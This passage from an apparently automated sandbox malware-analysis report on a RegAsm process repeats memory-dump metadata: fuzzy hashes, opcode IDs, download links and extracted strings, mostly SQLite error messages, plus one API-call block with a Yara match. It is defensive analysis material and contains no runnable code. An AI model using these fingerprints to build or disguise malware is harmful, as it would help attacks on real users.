                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
                                                                                                                                                                                                                                                              • API String ID: 0-361449301
                                                                                                                                                                                                                                                              • Opcode ID: 5ee0bcf0561411c8eec6358fad79cea98829a5dfa7b58c080b5431965f3d5477
                                                                                                                                                                                                                                                              • Instruction ID: 40e8e9c938ac436dd46a4a1288bd36b5f38d07595ba15ecc3a5e290a9082ad96
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee0bcf0561411c8eec6358fad79cea98829a5dfa7b58c080b5431965f3d5477
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E861E1B19007419FDB10CF28C885753B7E8EF54306F49492DE8AADA281E776EA4CCBD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: YHI;$temp$wrong number of vtable arguments
                                                                                                                                                                                                                                                              • API String ID: 0-3331964440
                                                                                                                                                                                                                                                              • Opcode ID: dfa723b382e76a260125e05aa00110e02320c225ea8e61e393307fde04f468e6
                                                                                                                                                                                                                                                              • Instruction ID: 2248300386dcf43b5e2b074a9b89054ed77a047b348e0dde533a87a9c5f9b02d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfa723b382e76a260125e05aa00110e02320c225ea8e61e393307fde04f468e6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6951C5B55043458FC714CF28D8405AABBF1BF99704F488A6EE48697741D332E68ACF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                                                                                                                                                                                                                              • API String ID: 0-593389478
                                                                                                                                                                                                                                                              • Opcode ID: 0e5f8357014686a72825f87863272aa1ec7531f113d41040a57f50a38b0d834d
                                                                                                                                                                                                                                                              • Instruction ID: 995503ffaba7289142b9b25c3aad1b982518ca824a328dba8ef82c6d4349936a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e5f8357014686a72825f87863272aa1ec7531f113d41040a57f50a38b0d834d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8041E531E002559FDB17DE24CA80B9EB3E8EF84314F39856DE88947291F776E845CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1986F4B0
                                                                                                                                                                                                                                                              • unable to delete/modify collation sequence due to active statements, xrefs: 1986F533
                                                                                                                                                                                                                                                              • misuse, xrefs: 1986F4BA
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1986F4BF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                              • API String ID: 0-3348720253
                                                                                                                                                                                                                                                              • Opcode ID: f63c7eda97ac9c25ad95d8b048da450b716613d6d333af8abf92afccfa1ef28c
                                                                                                                                                                                                                                                              • Instruction ID: 84572d764b17094ccdbfe9dc51c9622243b15733b3dd96aa363dc60ff5721613
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f63c7eda97ac9c25ad95d8b048da450b716613d6d333af8abf92afccfa1ef28c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 334115726043409BD700CF28EC84BAAB7E4EF91325F5C456EF5549F2D2E336E9158BA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • temp, xrefs: 19854C3E
                                                                                                                                                                                                                                                              • CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 19854CCB
                                                                                                                                                                                                                                                              • invalid arguments to fts4aux constructor, xrefs: 19854C9E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
                                                                                                                                                                                                                                                              • API String ID: 0-537686372
                                                                                                                                                                                                                                                              • Opcode ID: 55fdfc199ab2c85e8e4ec38d9d907c4f1377fbefffbcdc178d9a849e4ed31f7f
                                                                                                                                                                                                                                                              • Instruction ID: d4d2ace6330323e99c8a1ddb105889b0c0426ab0e661e1085b9c0d7757240dc8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55fdfc199ab2c85e8e4ec38d9d907c4f1377fbefffbcdc178d9a849e4ed31f7f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A413B752002419FD7048F2CD880AA67BF1EF95724F1C84ADECE68B242D632ED09DB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • YHI;, xrefs: 199B8856
                                                                                                                                                                                                                                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 199B895F
                                                                                                                                                                                                                                                              • os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 199B88E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
                                                                                                                                                                                                                                                              • API String ID: 0-1048546852
                                                                                                                                                                                                                                                              • Opcode ID: ccd5a00ca21eafa9a2e41cf581c937da5b32fd2b3baf2ff39e0f18c04cf3ad07
                                                                                                                                                                                                                                                              • Instruction ID: 7e3ac9d3cfc473a6f3074d2b060040c3f31b32d79d2187fc746aec1c5e5b55ae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccd5a00ca21eafa9a2e41cf581c937da5b32fd2b3baf2ff39e0f18c04cf3ad07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D213BB4608356AFE7119728C984FEBBBDDAFD4704F9C4C1DE5998A191C23598448393
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00406363
                                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00406389
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004063B8
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                              • String ID: v10
                                                                                                                                                                                                                                                              • API String ID: 2733184300-1337588462
                                                                                                                                                                                                                                                              • Opcode ID: 2465a5153b8ebb7219816266577d031178f9fabdb2e3b82eaf52d96ed69feb8f
                                                                                                                                                                                                                                                              • Instruction ID: 3b815f35c8779159b4c6e66c181decb50fe3ad77cea2142db40f7166cb1a7ae3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2465a5153b8ebb7219816266577d031178f9fabdb2e3b82eaf52d96ed69feb8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D315E71900219ABCB00EFA5DC85EEE7B78EF40754F11853FF812B62C1D7789A25CA59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198FEC42
                                                                                                                                                                                                                                                              • CREATE , xrefs: 198FEBFF
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 198FEC51
                                                                                                                                                                                                                                                              • database corruption, xrefs: 198FEC4C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-1360532505
                                                                                                                                                                                                                                                              • Opcode ID: 95416e13ca0744b280b97bd8c46f0197dc695f20e90385d69501c0765de8d153
                                                                                                                                                                                                                                                              • Instruction ID: 9227cf06877dd09a477433d3c0e19cc4f427991e157c43a955c65835ce918ff9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95416e13ca0744b280b97bd8c46f0197dc695f20e90385d69501c0765de8d153
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9315A625083C19AD7110E6DDC40BA27B91AF51A1AF1C50BEF8D98A1C3E326B584D771
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                                                                              • API String ID: 0-2528248365
                                                                                                                                                                                                                                                              • Opcode ID: c3a385fd02cfa0b865b88a90d096ed4b7aaecb2fbc5484a5a6db228fbf9a2fc2
                                                                                                                                                                                                                                                              • Instruction ID: f1615fc8a2cc5bd103071c54aca3382b14fd7f4a2c93b53f3ea78b1ddbb44ae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3a385fd02cfa0b865b88a90d096ed4b7aaecb2fbc5484a5a6db228fbf9a2fc2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF316939640B904BC314DF28C890AB3BBF3AF85711B9C845CE5D64B786E323E846C7A0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19831D3C
                                                                                                                                                                                                                                                              • misuse, xrefs: 19831D46
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 19831D4B
                                                                                                                                                                                                                                                              • unknown database: %s, xrefs: 19831CBD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
                                                                                                                                                                                                                                                              • API String ID: 0-142545749
                                                                                                                                                                                                                                                              • Opcode ID: b2b1db1aae64c007a0b0c92d43615ad276df544ccad0d36c8524f8b031a641d6
                                                                                                                                                                                                                                                              • Instruction ID: fbae3961ba0bdaef6d15ded189d5d00cb20754e4f3c19a9f1facfc6364ff4d19
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2b1db1aae64c007a0b0c92d43615ad276df544ccad0d36c8524f8b031a641d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 432147755007406BD7209A39DC80F9776B9BFD2B56F8C052CF85857281D771E606C7E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
